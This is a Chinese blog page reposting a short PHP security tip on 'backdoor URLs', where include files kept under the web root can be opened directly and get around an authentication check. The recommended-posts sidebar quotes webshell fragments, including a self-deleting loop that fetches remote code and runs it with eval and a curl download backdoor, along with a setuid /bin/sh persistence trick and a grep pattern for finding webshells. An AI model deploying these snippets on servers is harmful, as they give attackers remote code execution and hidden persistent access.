PHP安全编程:留心后门URL 直接可以通过URL访问(转)

最新推荐文章于 2024-06-13 15:01:36 发布
最新推荐文章于 2024-06-13 15:01:36 发布
阅读量332 收藏
点赞数
文章标签: php 数据库

后门URL是指虽然无需直接调用的资源能直接通过URL访问。例如,下面WEB应用可能向登入用户显示敏感信息:

<?php

$authenticated = FALSE;
$authenticated = check_auth();

/* ... */

if ($authenticated)
{
    include './sensitive.php';
}

?>

由于sensitive.php位于网站主目录下,用浏览器能跳过验证机制直接访问到该文件。这是由于在网站主目录下的所有文件都有一个相应的URL地址。在某些情况下,这些脚本可能执行一个重要的操作,这就增大了风险。

为了防止后门URL,你需要确认把所有包含文件保存在网站主目录以外。所有保存在网站主目录下的文件都是必须要通过URL直接访问的。

weixin_33739523
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php后门拿下当前目录
aici0819的博客
03-26 367
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
随记(五):一个简单又较隐蔽的PHP后门
XXR_Beta的博客
12-05 551
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
php后门木马常用命令分析与防范
主题模板站的博客
01-22 782
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite。2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13。//可将php代码存于非php后缀文件,例: x.jpg。
捡了一个非常淫荡的PHP后门,给跪了
weixin_30606461的博客
01-23 2827
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep...
一猥琐的PHP后门分析
橙虚缘空间
04-18 1125
Webshell代码如下:&lt;?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
2018国家网络安全宣传周网络安全知识:这些网络安全秘籍你必须懂.docx
06-07
建议: 手机用户不使用来历不明的APP,使用正规渠道下载 安装时要注意"应用权限"与产品功能是否直接相关 使用防病毒软件,为手机安全加上防护网 手机越狱和root要慎重 现象: 安卓root和苹果越狱会带来便利,可以安装...
2019国家网络安全宣传周网络安全知识:这些网络安全秘籍你必须懂.docx
06-07
建议: 手机用户不使用来历不明的APP,使用正规渠道下载 安装时要注意"应用权限"与产品功能是否直接相关 使用防病毒软件,为手机安全加上防护网 手机越狱和root要慎重 2019国家网络安全宣传周网络安全知识:这些网络...
2020年国家网络安全宣传周网络安全知识:这些网络安全秘籍你必须懂.docx
06-07
安装时要注意"应用权限"与产品功能是否直接相关 使用防病毒软件,为手机安全加上防护网 手机越狱和root要慎重 现象: 安卓root和苹果越狱会带来便利, 可以安装更多软件,实现更多高级功能。但如果安装到恶意APP,...
Python网络安全项目开发实战_防命令注入_编程案例解析实例详解课程教程.pdf
04-27
在页面中输入一个参数,然后服务器根据参数执行命令,返回结果...这种形式虽然不是非常常见的,但留心一下还是有必要的。最常见的就是输入一个 IP 地址,然后页面返回ping IP 的结果,殊不知这样会造成很大的安全隐患。
2018国家网络安全宣传周网络安全知识:这些网络安全秘籍你必须懂.doc
06-07
手机用户不使用来历不明的APP,使用正规渠道下载 安装时要注意"应用权限"与产品功能是否直接相关 使用防病毒软件,为手机安全加上防护网 手机越狱和root要慎重 现象: 安卓root和苹果越狱会带来便利, 可以安装更多...
Php后门php 后门
06-25
php 后门
PHP后门新玩法:一款猥琐的PHP后门分析
03-04
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的Webshell吧。Webshell代码如下:关键看下面这句代码,这里执行之后其实是一张图片,解密出来的图片地址如下:然后调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码的。这里执行以下语句来还原出恶意样本代码,如图所示:分析这段
linux服务器查杀,Linux服务器PHP后门查杀
weixin_42295892的博客
05-05 257
shell脚本一句话查找PHP一句话木马# find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval(gunerpress|eval(base64_decoolcode|spider_bc))" > /tmp/php.txt# grep -r --include=*.php '[^a-z]eval($_POST' . &gt...
workerman问题总结大全及解决方案
monkeyapi的博客
12-19 2711
workerman无法正常访问 问题描述:在阿里云ECS上部署了workerman的应用(ECS是专有网络),在ECS安全组里已经允许workerman需要的全部端口,但是外网一直不能正常打开(注,其他服务,比80端口外部是可以用访问的)。telnet连接显示“No route to host”,而且我是关闭了centos7的firewalld防火墙的,这让我很困惑。 问题原因: 因为对cent...
***技巧系列之常见的一些留后门手法
weixin_34237596的博客
02-11 1241
对于我们这样的菜手,好不容易搞了台服务器很不容易,如果被发现了就惨了。其实,开后门的方法有很多种,下面我来说说,我以前学习过的几种方法。 1. Setuid #cp /bin/sh /tmp/.root#chmod u+s /tmp/.root 加上 suid 位到shell 上,虽然很简单,但容易被发现。 2. Echo "hack:...
我今天终于知道后门在代码上是如何实现的
wjp_116的专栏
03-23 5423
我们开发的程序是要在生产一线使用的,这种软件不但要考虑功能,还要考虑到使用者的知识水平和个人素质。总有人喜欢不按规程操作,把这些问题交给管理者去规范是个很挠头的事情。这样只能在代码上进行处理了。比如不能在通信过程中退出程序,否则会造成通信数据的不完整性。而如果有时我们的程序有问题时又确实要在那种情况下退出,这样就需要在代码中增加一部分,只有点击了特定的按钮顺序才能退出程序。当然这部分代码是在我们技
怎么使用php后门,PHP后门的一些用法
weixin_36078790的博客
03-29 490
今天我们说一些最常见的PHP后门的一些用法首先,写一个最简单的后门,也可以叫做木马。
1. NAS和SAN存储
最新发布
u010198709的博客
06-13 287
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
大学生安全用电活动标语
05-10
1. 安全用电,人人有责,事故无情,防范先行。 2. 电线杆上高高挂,危险电线离心房。 3. 用电安全,万家灯火;用电不当,灾难降临。 4. 用电不当,火灾不等人。 5. 线路老化,电器故障,用电安全,处处留心。 6. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值